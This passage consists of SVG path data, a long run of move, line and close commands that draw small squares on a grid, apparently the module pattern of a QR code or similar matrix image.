25.2 41.4 z M 50.4 45 L 50.4 46.8 L 52.2 46.8 L 52.2 45 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 9 45 L 9 46.8 L 10.8 46.8 L 10.8 45 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 54 48.6 L 54 50.4 L 55.8 50.4 L 55.8 48.6 z M 55.8 18 L 55.8 19.8 L 57.6 19.8 L 57.6 18 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 59.4 14.4 L 59.4 16.2 L 61.2 16.2 L 61.2 14.4 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 36 19.8 L 36 21.6 L 37.8 21.6 L 37.8 19.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 41.4 39.6 L 41.4 41.4 L 43.2 41.4 L 43.2 39.6 z M 43.2 45 L 43.2 46.8 L 45.0 46.8 L 45.0 45 z M 39.6 16.2 L 39.6 18.0 L 41.4 18.0 L 41.4 16.2 z M 36 59.4 L 36 61.2 L 37.8 61.2 L 37.8 59.4 z M 18 64.8 L 18 66.6 L 19.8 66.6 L 19.8 64.8 z M 25.2 23.4 L 25.2 25.2 L 27.0 25.2 L 27.0 23.4 z M 21.6 52.2 L 21.6 54.0 L 23.4 54.0 L 23.4 52.2 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 50.4 57.6 L 50.4 59.4 L 52.2 59.4 L 52.2 57.6 z M 34.2 25.2 L 34.2 27.0 L 36.0 27.0 L 36.0 25.2 z M 27 54 L 27 55.8 L 28.8 55.8 L 28.8 54 z M 54 61.2 L 54 63.0 L 55.8 63.0 L 55.8 61.2 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 50.4 10.8 L 50.4 12.6 L 52.2 12.6 L 52.2 10.8 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 57.6 50.4 L 57.6 52.2 L 59.4 52.2 L 59.4 50.4 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 61.2 10.8 L 61.2 12.6 L 63.0 12.6 L 63.0 10.8 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 43.2 57.6 L 43.2 59.4 L 45.0 59.4 L 45.0 57.6 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 18 55.8 L 18 57.6 L 19.8 57.6 L 19.8 55.8 z M 45 37.8 L 45 39.6 L 46.8 39.6 L 46.8 37.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 48.6 63 L 48.6 64.8 L 50.4 64.8 L 50.4 63 z M 21.6 7.2 L 21.6 9.0 L 23.4 9.0 L 23.4 7.2 z M 25.2 54 L 25.2 55.8 L 27.0 55.8 L 27.0 54 z M 27 41.4 L 27 43.2 L 28.8 43.2 L 28.8 41.4 z M 7.2 57.6 L 7.2 59.4 L 9.0 59.4 L 9.0 57.6 z M 50.4 23.4 L 50.4 
25.2 L 52.2 25.2 L 52.2 23.4 z M 28.8 43.2 L 28.8 45.0 L 30.6 45.0 L 30.6 43.2 z M 10.8 61.2 L 10.8 63.0 L 12.6 63.0 L 12.6 61.2 z M 54 12.6 L 54 14.4 L 55.8 14.4 L 55.8 12.6 z M 59.4 46.8 L 59.4 48.6 L 61.2 48.6 L 61.2 46.8 z M 14.4 50.4 L 14.4 52.2 L 16.2 52.2 L 16.2 50.4 z M 63 7.2 L 63 9.0 L 64.8 9.0 L 64.8 7.2 z M 55.8 64.8 L 55.8 66.6 L 57.6 66.6 L 57.6 64.8 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 45 54 L 45 55.8 L 46.8 55.8 L 46.8 54 z M 37.8 25.2 L 37.8 27.0 L 39.6 27.0 L 39.6 25.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 39.6 37.8 L 39.6 39.6 L 41.4 39.6 L 41.4 37.8 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 64.8 14.4 L 64.8 16.2 L 66.6 16.2 L 66.6 14.4 z M 27 21.6 L 27 23.4 L 28.8 23.4 L 28.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 50.4 36 L 50.4 37.8 L 52.2 37.8 L 52.2 36 z M 32.4 19.8 L 32.4 21.6 L 34.2 21.6 L 34.2 19.8 z M 52.2 30.6 L 52.2 32.4 L 54.0 32.4 L 54.0 30.6 z M 30.6 39.6 L 30.6 41.4 L 32.4 41.4 L 32.4 39.6 z M 54 25.2 L 54 27.0 L 55.8 27.0 L 55.8 25.2 z M 7.2 23.4 L 7.2 25.2 L 9.0 25.2 L 9.0 23.4 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 57.6 14.4 L 57.6 16.2 L 59.4 16.2 L 59.4 14.4 z M 63 23.4 L 63 25.2 L 64.8 25.2 L 64.8 23.4 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 59.4 23.4 L 59.4 25.2 L 61.2 25.2 L 61.2 23.4 z M 61.2 46.8 L 61.2 48.6 L 63.0 48.6 L 63.0 46.8 z M 41.4 34.2 L 41.4 36.0 L 43.2 36.0 L 43.2 34.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 16.2 64.8 L 16.2 66.6 L 18.0 66.6 L 18.0 64.8 z M 39.6 21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 36 50.4 L 36 52.2 L 37.8 52.2 L 37.8 50.4 z M 45 30.6 L 45 32.4 L 46.8 32.4 L 46.8 30.6 z M 21.6 32.4 L 21.6 34.2 L 23.4 34.2 L 23.4 32.4 z M 64.8 55.8 L 64.8 57.6 L 66.6 57.6 L 66.6 55.8 z M 46.8 10.8 L 46.8 12.6 L 48.6 12.6 L 48.6 10.8 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 48.6 27 L 48.6 28.8 L 50.4 28.8 L 50.4 27 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 27 9 L 27 10.8 L 28.8 10.8 L 28.8 9 z M 25.2 46.8 L 25.2 48.6 L 27.0 48.6 L 27.0 46.8 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 54 45 L 54 46.8 L 55.8 46.8 L 55.8 45 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 55.8 50.4 L 55.8 52.2 L 57.6 52.2 L 57.6 50.4 z M 57.6 12.6 L 57.6 14.4 L 59.4 14.4 L 59.4 12.6 z M 10.8 25.2 L 10.8 27.0 L 12.6 27.0 L 12.6 25.2 z M 16.2 34.2 L 16.2 36.0 L 18.0 36.0 L 18.0 34.2 z M 59.4 10.8 L 59.4 12.6 L 61.2 12.6 L 61.2 10.8 z M 12.6 41.4 L 12.6 43.2 L 14.4 43.2 L 14.4 41.4 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 45 46.8 L 45 48.6 L 46.8 48.6 L 46.8 46.8 z M 64.8 21.6 L 64.8 23.4 L 66.6 23.4 L 66.6 21.6 z M 23.4 54 L 23.4 55.8 L 25.2 55.8 L 25.2 54 z M 50.4 61.2 L 50.4 63.0 L 52.2 63.0 L 52.2 61.2 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 52.2 63 L 52.2 64.8 L 54.0 64.8 L 54.0 63 z M 34.2 43.2 L 34.2 45.0 L 36.0 45.0 L 36.0 43.2 z M 30.6 14.4 L 30.6 16.2 L 32.4 16.2 L 32.4 14.4 z M 54 57.6 L 54 59.4 L 55.8 59.4 L 55.8 57.6 z M 50.4 14.4 L 50.4 16.2 L 52.2 16.2 L 52.2 14.4 z M 55.8 37.8 L 55.8 39.6 L 57.6 39.6 L 57.6 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 57.6 54 L 57.6 55.8 L 59.4 55.8 L 59.4 54 z M 54 18 L 54 19.8 L 55.8 19.8 L 55.8 18 z M 12.6 50.4 L 12.6 52.2 L 14.4 52.2 L 14.4 50.4 z M 61.2 7.2 L 61.2 9.0 L 63.0 9.0 L 63.0 7.2 z M 14.4 41.4 L 14.4 43.2 L 16.2 43.2 L 16.2 41.4 z M 41.4 59.4 L 41.4 61.2 L 43.2 
61.2 L 43.2 59.4 z M 41.4 12.6 L 41.4 14.4 L 43.2 14.4 L 43.2 12.6 z M 37.8 48.6 L 37.8 50.4 L 39.6 50.4 L 39.6 48.6 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 23.4 12.6 L 23.4 14.4 L 25.2 14.4 L 25.2 12.6 z M 7.2 61.2 L 7.2 63.0 L 9.0 63.0 L 9.0 61.2 z M 55.8 46.8 L 55.8 48.6 L 57.6 48.6 L 57.6 46.8 z M 52.2 25.2 L 52.2 27.0 L 54.0 27.0 L 54.0 25.2 z M 30.6 48.6 L 30.6 50.4 L 32.4 50.4 L 32.4 48.6 z M 10.8 57.6 L 10.8 59.4 L 12.6 59.4 L 12.6 57.6 z M 54 9 L 54 10.8 L 55.8 10.8 L 55.8 9 z M 55.8 28.8 L 55.8 30.6 L 57.6 30.6 L 57.6 28.8 z M 14.4 54 L 14.4 55.8 L 16.2 55.8 L 16.2 54 z M 57.6 34.2 L 57.6 36.0 L 59.4 36.0 L 59.4 34.2 z M 36 30.6 L 36 32.4 L 37.8 32.4 L 37.8 30.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 14.4 64.8 L 14.4 66.6 L 16.2 66.6 L 16.2 64.8 z M 41.4 21.6 L 41.4 23.4 L 43.2 23.4 L 43.2 21.6 z M 64.8 64.8 L 64.8 66.6 L 66.6 66.6 L 66.6 64.8 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 48.6 46.8 L 48.6 48.6 L 50.4 48.6 L 50.4 46.8 z M 21.6 23.4 L 21.6 25.2 L 23.4 25.2 L 23.4 23.4 z M 64.8 18 L 64.8 19.8 L 66.6 19.8 L 66.6 18 z M 46.8 23.4 L 46.8 25.2 L 48.6 25.2 L 48.6 23.4 z M 34.2 54 L 34.2 55.8 L 36.0 55.8 L 36.0 54 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 7.2 45 L 7.2 46.8 L 9.0 46.8 L 9.0 45 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 32.4 L 30.6 30.6 z M 9 36 L 9 37.8 L 10.8 37.8 L 10.8 36 z M 52.2 41.4 L 52.2 43.2 L 54.0 43.2 L 54.0 41.4 z M 10.8 48.6 L 10.8 50.4 L 12.6 50.4 L 12.6 48.6 z M 54 21.6 L 54 23.4 L 55.8 23.4 L 55.8 21.6 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 57.6 18 L 57.6 19.8 L 59.4 19.8 L 59.4 18 z M 41.4 37.8 L 41.4 39.6 L 43.2 39.6 L 43.2 37.8 z M 37.8 9 L 37.8 10.8 L 39.6 10.8 L 39.6 9 z M 19.8 39.6 L 19.8 41.4 L 21.6 41.4 L 21.6 39.6 z M 43.2 25.2 L 43.2 27.0 L 45.0 27.0 L 45.0 25.2 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 45 27 L 45 28.8 L 46.8 28.8 L 46.8 27 z M 25.2 64.8 L 25.2 66.6 L 27.0 66.6 L 27.0 64.8 z M 37.8 55.8 L 37.8 57.6 L 39.6 57.6 L 39.6 55.8 z M 64.8 59.4 L 64.8 61.2 L 66.6 61.2 L 66.6 59.4 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 25.2 25.2 L 25.2 27.0 L 27.0 27.0 L 27.0 25.2 z M 27 12.6 L 27 14.4 L 28.8 14.4 L 28.8 12.6 z M 50.4 52.2 L 50.4 54.0 L 52.2 54.0 L 52.2 52.2 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 52.2 43.2 L 52.2 45.0 L 54.0 45.0 L 54.0 43.2 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 12.6 34.2 L 12.6 36.0 L 14.4 36.0 L 14.4 34.2 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 57.6 59.4 L 57.6 61.2 L 59.4 61.2 L 59.4 59.4 z M 59.4 7.2 L 59.4 9.0 L 61.2 9.0 L 61.2 7.2 z M 12.6 45 L 12.6 46.8 L 14.4 46.8 L 14.4 45 z M 52.2 64.8 L 52.2 66.6 L 54.0 66.6 L 54.0 64.8 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 14.4 46.8 L 14.4 48.6 L 16.2 48.6 L 16.2 46.8 z M 16.2 48.6 L 16.2 50.4 L 18.0 50.4 L 18.0 48.6 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 64.8 43.2 L 64.8 45.0 L 66.6 45.0 L 66.6 43.2 z M 39.6 55.8 L 39.6 57.6 L 41.4 57.6 L 41.4 55.8 z M 64.8 25.2 L 64.8 27.0 L 66.6 27.0 L 66.6 25.2 z M 28.8 12.6 L 28.8 14.4 L 30.6 14.4 L 30.6 12.6 z M 34.2 46.8 L 34.2 48.6 L 36.0 48.6 L 36.0 46.8 z M 30.6 10.8 L 30.6 12.6 L 32.4 12.6 L 32.4 10.8 z M 27 61.2 L 27 63.0 L 28.8 63.0 L 28.8 61.2 z M 54 54 L 54 55.8 L 55.8 55.8 L 55.8 54 z M 50.4 18 L 50.4 19.8 L 52.2 19.8 L 52.2 18 z M 28.8 52.2 L 28.8 54.0 L 30.6 54.0 L 30.6 52.2 z M 55.8 41.4 L 55.8 43.2 L 57.6 43.2 L 57.6 41.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 54 14.4 L 54 
16.2 L 55.8 16.2 L 55.8 14.4 z M 59.4 52.2 L 59.4 54.0 L 61.2 54.0 L 61.2 52.2 z M 12.6 54 L 12.6 55.8 L 14.4 55.8 L 14.4 54 z M 55.8 23.4 L 55.8 25.2 L 57.6 25.2 L 57.6 23.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 61.2 18 L 61.2 19.8 L 63.0 19.8 L 63.0 18 z M 14.4 59.4 L 14.4 61.2 L 16.2 61.2 L 16.2 59.4 z M 41.4 63 L 41.4 64.8 L 43.2 64.8 L 43.2 63 z M 12.6 64.8 L 12.6 66.6 L 14.4 66.6 L 14.4 64.8 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 18 63 L 18 64.8 L 19.8 64.8 L 19.8 63 z M 45 59.4 L 45 61.2 L 46.8 61.2 L 46.8 59.4 z M 41.4 16.2 L 41.4 18.0 L 43.2 18.0 L 43.2 16.2 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 45 19.8 L 45 21.6 L 46.8 21.6 L 46.8 19.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 64.8 9 L 64.8 10.8 L 66.6 10.8 L 66.6 9 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 52.2 21.6 L 52.2 23.4 L 54.0 23.4 L 54.0 21.6 z M 57.6 41.4 L 57.6 43.2 L 59.4 43.2 L 59.4 41.4 z M 10.8 54 L 10.8 55.8 L 12.6 55.8 L 12.6 54 z M 54 34.2 L 54 36.0 L 55.8 36.0 L 55.8 34.2 z M 59.4 39.6 L 59.4 41.4 L 61.2 41.4 L 61.2 39.6 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 61.2 23.4 L 61.2 25.2 L 63.0 25.2 L 63.0 23.4 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 18 46.8 L 18 48.6 L 19.8 48.6 L 19.8 46.8 z M 23.4 64.8 L 23.4 66.6 L 25.2 66.6 L 25.2 64.8 z M 48.6 36 L 48.6 37.8 L 50.4 37.8 L 50.4 36 z M 45 7.2 L 45 9.0 L 46.8 9.0 L 46.8 7.2 z M 21.6 27 L 21.6 28.8 L 23.4 28.8 L 23.4 27 z M 46.8 34.2 L 46.8 36.0 L 48.6 36.0 L 48.6 34.2 z M 23.4 25.2 L 23.4 27.0 L 25.2 27.0 L 25.2 25.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 32.4 27 L 32.4 28.8 L 34.2 28.8 L 34.2 27 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 30.6 32.4 L 30.6 34.2 L 32.4 34.2 L 32.4 32.4 z M 7.2 30.6 L 7.2 32.4 L 9.0 32.4 L 9.0 30.6 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 57.6 7.2 L 57.6 9.0 L 59.4 9.0 L 59.4 7.2 z M 10.8 34.2 L 10.8 36.0 L 12.6 36.0 L 12.6 34.2 z M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 41.4 41.4 L 41.4 43.2 L 43.2 43.2 L 43.2 41.4 z M 37.8 19.8 L 37.8 21.6 L 39.6 21.6 L 39.6 19.8 z M 63 41.4 L 63 43.2 L 64.8 43.2 L 64.8 41.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 46.8 18 L 46.8 19.8 L 48.6 19.8 L 48.6 18 z M 39.6 61.2 L 39.6 63.0 L 41.4 63.0 L 41.4 61.2 z M 48.6 19.8 L 48.6 21.6 L 50.4 21.6 L 50.4 19.8 z M 27 16.2 L 27 18.0 L 28.8 18.0 L 28.8 16.2 z M 23.4 45 L 23.4 46.8 L 25.2 46.8 L 25.2 45 z M 50.4 55.8 L 50.4 57.6 L 52.2 57.6 L 52.2 55.8 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 34.2 27 L 34.2 28.8 L 36.0 28.8 L 36.0 27 z M 27 55.8 L 27 57.6 L 28.8 57.6 L 28.8 55.8 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 50.4 9 L 50.4 10.8 L 52.2 10.8 L 52.2 9 z M 55.8 57.6 L 55.8 59.4 L 57.6 59.4 L 57.6 57.6 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 61.2 59.4 L 61.2 61.2 L 63.0 61.2 L 63.0 59.4 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 41.4 50.4 L 41.4 52.2 L 43.2 52.2 L 43.2 50.4 z M 10.8 64.8 L 10.8 66.6 L 12.6 66.6 L 12.6 64.8 z M 43.2 41.4 L 43.2 43.2 L 45.0 43.2 L 45.0 41.4 z M 18 54 L 18 55.8 L 19.8 55.8 L 19.8 54 z M 46.8 52.2 L 46.8 54.0 L 48.6 54.0 L 48.6 52.2 z M 23.4 61.2 L 23.4 63.0 L 25.2 63.0 L 25.2 61.2 z M 32.4 45 L 32.4 46.8 L 34.2 46.8 L 34.2 45 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 54 50.4 L 54 52.2 L 55.8 52.2 L 55.8 50.4 z M 7.2 55.8 
L 7.2 57.6 L 9.0 57.6 L 9.0 55.8 z M 50.4 21.6 L 50.4 23.4 L 52.2 23.4 L 52.2 21.6 z M 55.8 45 L 55.8 46.8 L 57.6 46.8 L 57.6 45 z M 9 54 L 9 55.8 L 10.8 55.8 L 10.8 54 z M 54 10.8 L 54 12.6 L 55.8 12.6 L 55.8 10.8 z M 12.6 57.6 L 12.6 59.4 L 14.4 59.4 L 14.4 57.6 z M 61.2 14.4 L 61.2 16.2 L 63.0 16.2 L 63.0 14.4 z M 43.2 54 L 43.2 55.8 L 45.0 55.8 L 45.0 54 z M 18 59.4 L 18 61.2 L 19.8 61.2 L 19.8 59.4 z M 45 55.8 L 45 57.6 L 46.8 57.6 L 46.8 55.8 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 19.8 50.4 L 19.8 52.2 L 21.6 52.2 L 21.6 50.4 z M 46.8 36 L 46.8 37.8 L 48.6 37.8 L 48.6 36 z M 21.6 64.8 L 21.6 66.6 L 23.4 66.6 L 23.4 64.8 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 64.8 12.6 L 64.8 14.4 L 66.6 14.4 L 66.6 12.6 z M 46.8 25.2 L 46.8 27.0 L 48.6 27.0 L 48.6 25.2 z M 27 23.4 L 27 25.2 L 28.8 25.2 L 28.8 23.4 z M 50.4 34.2 L 50.4 36.0 L 52.2 36.0 L 52.2 34.2 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 52.2 32.4 L 52.2 34.2 L 54.0 34.2 L 54.0 32.4 z M 34.2 19.8 L 34.2 21.6 L 36.0 21.6 L 36.0 19.8 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 54 30.6 L 54 32.4 L 55.8 32.4 L 55.8 30.6 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 59.4 36 L 59.4 37.8 L 61.2 37.8 L 61.2 36 z M 55.8 7.2 L 55.8 9.0 L 57.6 9.0 L 57.6 7.2 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 57.6 27 L 57.6 28.8 L 59.4 28.8 L 59.4 27 z M 63 32.4 L 63 34.2 L 64.8 34.2 L 64.8 32.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 41.4 28.8 L 41.4 30.6 L 43.2 30.6 L 43.2 28.8 z M 19.8 37.8 L 19.8 39.6 L 21.6 39.6 L 21.6 37.8 z M 63 43.2 L 63 45.0 L 64.8 45.0 L 64.8 43.2 z M 43.2 34.2 L 43.2 36.0 L 45.0 36.0 L 45.0 34.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 48.6 39.6 L 48.6 41.4 L 50.4 41.4 L 50.4 39.6 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 64.8 54 L 64.8 55.8 L 66.6 55.8 L 66.6 54 z M 46.8 30.6 L 46.8 32.4 L 48.6 32.4 L 48.6 30.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 21.6 41.4 L 21.6 43.2 L 23.4 43.2 L 23.4 41.4 z M 27 32.4 L 27 34.2 L 28.8 34.2 L 28.8 32.4 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 50.4 46.8 L 50.4 48.6 L 52.2 48.6 L 52.2 46.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 10.8 41.4 L 10.8 43.2 L 12.6 43.2 L 12.6 41.4 z M 54 43.2 L 54 45.0 L 55.8 45.0 L 55.8 43.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 57.6 10.8 L 57.6 12.6 L 59.4 12.6 L 59.4 10.8 z M 10.8 30.6 L 10.8 32.4 L 12.6 32.4 L 12.6 30.6 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 59.4 12.6 L 59.4 14.4 L 61.2 14.4 L 61.2 12.6 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 9 64.8 L 9 66.6 L 10.8 66.6 L 10.8 64.8 z M 61.2 50.4 L 61.2 52.2 L 63.0 52.2 L 63.0 50.4 z M 41.4 45 L 41.4 46.8 L 43.2 46.8 L 43.2 45 z M 19.8 32.4 L 19.8 34.2 L 21.6 34.2 L 21.6 32.4 z M 63 59.4 L 63 61.2 L 64.8 61.2 L 64.8 59.4 z M 43.2 46.8 L 43.2 48.6 L 45.0 48.6 L 45.0 46.8 z M 36 61.2 L 36 63.0 L 37.8 63.0 L 37.8 61.2 z M 45 48.6 L 45 50.4 L 46.8 50.4 L 46.8 48.6 z M 64.8 37.8 L 64.8 39.6 L 66.6 39.6 L 66.6 37.8 z M 39.6 57.6 L 39.6 59.4 L 41.4 59.4 L 41.4 57.6 z M 48.6 9 L 48.6 10.8 L 50.4 10.8 L 50.4 9 z M 21.6 54 L 21.6 55.8 L 23.4 55.8 L 23.4 54 z M 50.4 59.4 L 50.4 61.2 L 52.2 61.2 L 52.2 59.4 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 28.8 7.2 L 28.8 9.0 L 30.6 9.0 L 30.6 7.2 z M 52.2 50.4 L 52.2 52.2 L 54.0 52.2 L 54.0 50.4 z M 30.6 16.2 L 30.6 18.0 L 32.4 18.0 L 32.4 16.2 z M 27 59.4 L 27 61.2 L 28.8 61.2 L 28.8 59.4 z M 54 63 L 54 64.8 L 55.8 64.8 
L 55.8 63 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 50.4 12.6 L 50.4 14.4 L 52.2 14.4 L 52.2 12.6 z M 28.8 61.2 L 28.8 63.0 L 30.6 63.0 L 30.6 61.2 z M 55.8 61.2 L 55.8 63.0 L 57.6 63.0 L 57.6 61.2 z M 30.6 63 L 30.6 64.8 L 32.4 64.8 L 32.4 63 z M 57.6 52.2 L 57.6 54.0 L 59.4 54.0 L 59.4 52.2 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 61.2 12.6 L 61.2 14.4 L 63.0 14.4 L 63.0 12.6 z M 63 54 L 63 55.8 L 64.8 55.8 L 64.8 54 z M 16.2 41.4 L 16.2 43.2 L 18.0 43.2 L 18.0 41.4 z M 48.6 64.8 L 48.6 66.6 L 50.4 66.6 L 50.4 64.8 z M 18 50.4 L 18 52.2 L 19.8 52.2 L 19.8 50.4 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 46.8 63 L 46.8 64.8 L 48.6 64.8 L 48.6 63 z M 39.6 48.6 L 39.6 50.4 L 41.4 50.4 L 41.4 48.6 z M 32.4 55.8 L 32.4 57.6 L 34.2 57.6 L 34.2 55.8 z M 25.2 55.8 L 25.2 57.6 L 27.0 57.6 L 27.0 55.8 z M 7.2 59.4 L 7.2 61.2 L 9.0 61.2 L 9.0 59.4 z M 50.4 25.2 L 50.4 27.0 L 52.2 27.0 L 52.2 25.2 z M 28.8 45 L 28.8 46.8 L 30.6 46.8 L 30.6 45 z M 9 50.4 L 9 52.2 L 10.8 52.2 L 10.8 50.4 z M 30.6 50.4 L 30.6 52.2 L 32.4 52.2 L 32.4 50.4 z M 54 7.2 L 54 9.0 L 55.8 9.0 L 55.8 7.2 z M 59.4 45 L 59.4 46.8 L 61.2 46.8 L 61.2 45 z M 12.6 61.2 L 12.6 63.0 L 14.4 63.0 L 14.4 61.2 z M 57.6 32.4 L 57.6 34.2 L 59.4 34.2 L 59.4 32.4 z M 59.4 34.2 L 59.4 36.0 L 61.2 36.0 L 61.2 34.2 z M 41.4 23.4 L 41.4 25.2 L 43.2 25.2 L 43.2 23.4 z M 46.8 46.8 L 46.8 48.6 L 48.6 48.6 L 48.6 46.8 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 48.6 48.6 L 48.6 50.4 L 50.4 50.4 L 50.4 48.6 z M 45 12.6 L 45 14.4 L 46.8 14.4 L 46.8 12.6 z M 21.6 21.6 L 21.6 23.4 L 23.4 23.4 L 23.4 21.6 z M 64.8 16.2 L 64.8 18.0 L 66.6 18.0 L 66.6 16.2 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z M 25.2 10.8 L 25.2 12.6 L 27.0 12.6 L 27.0 10.8 z M 34.2 55.8 L 34.2 57.6 L 36.0 57.6 L 36.0 55.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 50.4 37.8 L 50.4 39.6 L 52.2 39.6 L 52.2 37.8 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 34.2 9 L 34.2 10.8 L 36.0 10.8 L 36.0 9 z M 10.8 46.8 L 